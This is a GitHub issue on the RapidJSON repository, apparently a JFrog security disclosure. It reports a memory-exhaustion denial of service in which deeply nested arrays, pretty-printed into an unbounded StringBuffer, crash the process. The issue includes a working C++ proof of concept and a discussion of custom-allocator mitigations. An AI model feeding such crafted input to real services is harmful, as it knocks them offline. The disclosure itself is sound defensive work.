Tencent / rapidjson

A fast JSON parser/generator for C++ with both SAX/DOM style API
http://rapidjson.org/
Other
14.28k stars 3.53k forks source link

Memory exhaustion denial of service #2283

Open orihjfrog opened 6 months ago

orihjfrog commented 6 months ago

Summary

RapidJSON crashes when parsing a malformed JSON input.

Technical Details

The function Accept in document.h is used to visit values and handle them. One of the available handlers is the PrettyWriter handler. The PrettyWriter handler writes the objects to a stream. One of the available stream types is StringBuffer, which has no limit to the amount of data written into it. Since the PrettyWriter handler writes spaces for arrays and objects, more memory is needed to output a nested array or object than the memory needed for representing them in the first place. A malicious JSON with a very deeply nested array or object can cause a memory exhaustion and crash the software, even if the nested array isn’t too deep for the recursive parser.

Proof of Concept

The following code will crash before printing the string “end”. Note that we used a pretty small recursion (50000), and we used the recursive version of the Parse function, to show that the recursion is small enough to parse, but creates a string too big.

#include <iostream>
#include "rapidjson/document.h"
#include "rapidjson/stringbuffer.h"
#include "rapidjson/prettywriter.h"

using namespace rapidjson;

int main() {
   std::string json = "{\"a\":";
   for (int i = 0; i < 50000; i++) {
       json += "[";
   }
   json += "5";
   for (int i = 0; i < 50000; i++) {
       json += "]";
   }
   json += "}";

   Document d;

   std::cout << "before parsing" << std::endl << std::flush;

   d.Parse(json.c_str());

   Value& s = d["a"];

   std::cout << "before converting back to string" << std::endl << std::flush;

   StringBuffer buffer;
   PrettyWriter<StringBuffer> writer(buffer);
   s.Accept(writer);

   std::cout << "end" << std::endl << std::flush;

   std::flush(std::cout);
   return 0;
}

When running this code we got:

before parsing
before converting back to string
Killed

Fix suggestion

Add an argument to StringBuffer that will allow limiting the size of the string.

Credit

The vulnerability was discovered by Ori Hollander of the JFrog Security Research team.

srmish-jfrog commented 6 months ago

We could not find an official RapidJSON disclosure email address. We tried to report this issue privately to the package maintainer (miloyip@gmail.com) but didn't receive a response for more than 6 months. Hopefully someone can see this issue here and address it.

aikawayataro commented 5 months ago

You can define your own allocator with memory cap in this case.

srmish-jfrog commented 5 months ago

How can this be done? Is it mentioned in the documentation somewhere? (we couldn't find this mentioned as an issue anywhere)

Why not add a default memory cap with a reasonable limit in order to avoid DoS?

aikawayataro commented 5 months ago

How can this be done?

By defining your own allocator type and passing it as a template argument to any dependent type/function. There was a similar topic discussed here earlier about the "null from malloc" problem.

Why not add a default memory cap with a reasonable limit in order to avoid DoS?

I think for the same reason, you won't find this kind of "safety" in many other tools. Do you have this reasonable limit in your std::vector? I can't find anywhere that RapidJSON offers memory safety out of the box. This principle applies to countless C/C++ libraries: if you need safety, you either choose safety-ready libraries or implement this mechanism yourself. With RapidJSON it's possible to implement safety, you can define your own allocator types, use filters, streams and SAX.

aikawayataro commented 5 months ago

I think the main reason RapidJSON is considered unsafe is that it does not throw exceptions by design. But you can easily extend it.

The use of this library in new projects should be a matter of careful consideration. While it works and can be hacked for memory safety and exceptions, there has been no new release for 8 years. As far as I can see, only bug fixes are merged. If you need fast json parser there are many libraries with a healthy release model and some of them are even faster than RapidJSON.